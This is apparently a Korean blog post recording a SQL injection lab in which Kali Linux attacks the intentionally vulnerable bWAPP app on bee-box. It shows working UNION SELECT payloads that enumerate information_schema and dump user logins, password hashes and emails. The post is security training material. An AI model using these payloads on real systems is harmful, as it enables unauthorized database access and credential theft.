profile image

L o a d i n g . . .

실습 환경 : kali-linux(공격자 pc) ---> bee-box(희생자 pc)

kali-linux에서 bee-box ip로 접속

 

choose your bug -> sql injection(GET/Search) 선택

 

 

bee-box의 DB 확인

mysql -u root -p

mysql > show databases;

 

bWAPP의 tables

 

heroes의 column 정보

 

정상적인 sql 문 뒤에 or 1=1을 붙이자, 모두 참으로 인식해 모든 정보가 다 나옴.

 

union select 명령어를 통해 내가 알고자 하는 정보가 뒤에 붙어서 나옴.

 

 

 

 

kali-linux(공격자 pc)에서 DB 정보 획득

' UNION SELECT ALL 1,2,3,4,5,6,7#

위 명령어를 통해 db 칼럼의 개수가 7개인 것을 확인했다. 또 뒤에 숫자 2,3,5,4 가 붙은 것을 알 수 있다.

 

UNION SELECT ALL 1,@@version,3,4,5,6,7#

@@version을 통해 버전 정보 확인

 

0' UNION SELECT ALL 1,table_name,3,4,5,6,7 from information_schema.tables#

information_schema로부터 테이블 정보 갖고옴.

 

0' UNION SELECT null, table_schema, table_name, column_name , null , null ,null from information_schema.columns#

information_schema 로부터 column_name을 얻어옴.

우리가 관심있는 password, id 등의 데이터를 발견함.

 

0' UNION SELECT ALL 1, login, password, 4, email, 6, 7 from users#

users로부터 login, password, email에 해당하는 데이터를 얻음

 

알아낸 password가 SHA-1 알고리즘으로 암호화된 취약한 패스워드임을 알 수 있다.

'Hacking > Webhacking' 카테고리의 다른 글

[Webhacking] Time based SQL Injection 실습  (0) 2021.04.11
[Webhacking] Blind SQL Injection 실습  (0) 2021.04.11
[Webhacking] SQL Injection  (0) 2021.04.10
[Webhacking] 자동 분석 도구 공격  (0) 2021.04.02
[Webhacking] Nmap  (0) 2021.03.26
복사했습니다!